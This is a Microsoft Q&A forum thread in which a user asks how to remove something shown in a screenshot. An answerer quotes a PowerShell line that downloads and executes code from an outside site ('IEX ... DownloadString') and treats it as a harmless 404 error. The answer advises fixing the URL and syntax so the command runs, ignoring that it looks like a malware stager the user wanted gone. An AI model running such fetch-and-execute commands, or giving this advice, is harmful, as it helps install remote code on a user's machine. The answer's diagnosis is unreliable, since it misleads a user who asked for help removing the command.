how to remove this?

raphael amorim 0 Reputation points
2025-08-08T22:06:21.6166667+00:00

image.png

Windows for home | Windows 10 | Security and privacy
0 comments No comments
{count} votes

1 answer

Sort by: Most helpful
  1. Jeronimo Fuerte 12,330 Reputation points Independent Advisor
    2025-08-08T23:06:23.9166667+00:00

    Hi! That error just means the URL you’re downloading doesn’t exist. In the screenshot PowerShell is trying to "IEX $wc.DownloadString('https://elevenen.site/knottiness')" and the server replies 404 Not Found. So the issue isn’t your PC or TLS, it's the path. Fix the URL (maybe it needs the right filename like or a different path), or ask who share you the link.

    Also there’s a stray "}" at the end of your line, that seems isn’t closing a prior block, you might need to remove it.

    0 comments No comments

Your answer

Answers can be marked as Accepted Answers by the question author, which helps users to know the answer solved the author's problem.